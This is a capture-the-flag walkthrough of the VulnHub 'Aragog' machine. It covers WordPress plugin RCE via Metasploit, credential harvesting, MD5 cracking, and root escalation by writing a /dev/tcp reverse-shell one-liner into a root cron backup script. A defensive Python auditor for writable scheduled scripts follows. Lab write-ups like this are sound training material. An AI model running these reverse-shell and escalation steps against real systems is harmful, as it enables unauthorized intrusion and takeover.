1. Target machine address:
HarryPotter: Aragog (1.0.2) ~ VulnHub
This is the first machine of the Deathly Hallows trilogy. Aragog is the name of the spider raised by Hagrid, and it also appears in the Chamber of Secrets.
2. Penetration process
Determine the target machine's IP and the attack machine's IP, then scan the target's open ports.
Only ports 22 and 80 are open. Directory brute-forcing on port 80 shows that the site runs the WordPress framework.
The page gives a hint that the exploitable point lies in a WordPress plugin.
Viewing the page source reveals a domain name; open the hosts file and bind the target IP to that domain name.
The next step is to scan with wpscan. An API token is needed here to get fuller results: register on the official website, copy your api-token and use it in the command.
wpscan --url http://192.168.56.143/blog --api-token=xxxxx -e p --plugins-detection aggressive
Registration is free: WPScan: WordPress Security Scanner
Scan with the command above.
The plugin it finds is one I have heard a lot about: it has an RCE. Look up how the vulnerability is used and bounce a reverse shell back to the local Kali machine. Alternatively, use msfconsole and search for the related module.
Select 1, then set the parameters.
Once everything is set, run it.
The attack succeeds and the connection is established.
Check the uid, then enter the shell and upgrade it to an interactive shell.
After some looking around, I found a user, hagrid98, in whose home directory the first Horcrux is located. On inspection it is base64 encoded.
Then decode it:
RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets
This is Voldemort's diary.
The next step is privilege escalation. A WordPress installation ships with a default configuration file. After searching, I found the WordPress directory, entered it, and found the configuration file, which contains an account and password.
With the database user and password found, I logged into the database to look for useful information.
It yields a username and password; the password is stored as an MD5 hash, so crack it.
MD5 online lookup: SOMD5
Log in over ssh as this user. The connection succeeds. I try to escalate privileges as this user and find nothing usable.
So I turn to a privilege-escalation enumeration script for detection: start a web server locally and download the script over the remote ssh session.
Make it executable.
After running it, nothing much is discovered, so I switch to a different privilege-escalation enumeration script.
Run it.
This run finds a backup script that performs backup operations periodically, and it is executed as root. So I write the following reverse shell directly into the backup file:
echo 'bash -i >& /dev/tcp/192.168.56.136/7899 0>&1'>/opt/.backup.sh
When the backup script next runs, the listener on Kali receives the reverse shell, privileges are elevated to root, and the second Horcrux is found.
There are two Horcruxes in the first part, and the penetration ends here.
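The root cause of this escalation is a script that root runs on a schedule but that a low-privilege user can overwrite. As an added defender's check (not part of the original write-up), the following Python audits such a script and every directory on its path and flags anything other than root being able to modify it. The path /opt/.backup.sh is taken from the write-up; the assumption that the job runs as root is constructed for the example.

```python
import os
import stat
from typing import List

ROOT_UID = 0


def assess(mode: int, owner_uid: int, label: str) -> List[str]:
    """Findings for one filesystem object that root executes or traverses.

    mode is st_mode and owner_uid is st_uid from os.lstat. Kept pure so it can
    be tested with constructed values without depending on the host.
    """
    findings = []
    is_dir = stat.S_ISDIR(mode)
    perms = stat.S_IMODE(mode)
    if owner_uid != ROOT_UID:
        findings.append(f"{label}: owned by uid {owner_uid}, not root; owner can replace it")
    # A sticky directory (like /tmp) stops non-owners deleting or renaming
    # entries, so writable-with-sticky is not flagged for directories.
    sticky_dir = is_dir and bool(mode & stat.S_ISVTX)
    if perms & stat.S_IWGRP and not sticky_dir:
        findings.append(f"{label}: group-writable (mode {perms:04o})")
    if perms & stat.S_IWOTH and not sticky_dir:
        findings.append(f"{label}: world-writable (mode {perms:04o})")
    return findings


def audit_scheduled_script(path: str) -> List[str]:
    """Audit a script run by a root cron job: the file itself plus each parent
    directory, since a writable parent lets a user swap the file out."""
    findings = []
    p = os.path.abspath(path)
    while True:  # walk /opt/.backup.sh -> /opt -> /
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            return [f"{p}: does not exist; a scheduled script that is missing can be planted"]
        if stat.S_ISLNK(st.st_mode):
            findings.append(f"{p}: is a symlink; audit its target as well")
        findings.extend(assess(st.st_mode, st.st_uid, p))
        parent = os.path.dirname(p)
        if parent == p:
            return findings
        p = parent


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/opt/.backup.sh"
    for line in audit_scheduled_script(target) or ["no writable component found"]:
        print(line)
```

On a real host, run it against every script referenced from /etc/crontab, /etc/cron.d and root's own crontab; an empty result means only root can alter the job.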
3. Summary
To summarize this machine: the overall approach is to collect information and then scan for vulnerabilities in the frameworks that can be exploited. There are small details along the way that are flexible and changeable, but the overall idea stays the same. Finally, during the normal privilege escalation steps I ran out of ideas and used an enumeration script, which found the existing backup file. It is best to collect and check privilege escalation information yourself first, and only fall back on scripts when there is no other way.
The second and third parts of Harry Potter and the Deathly Hallows will follow!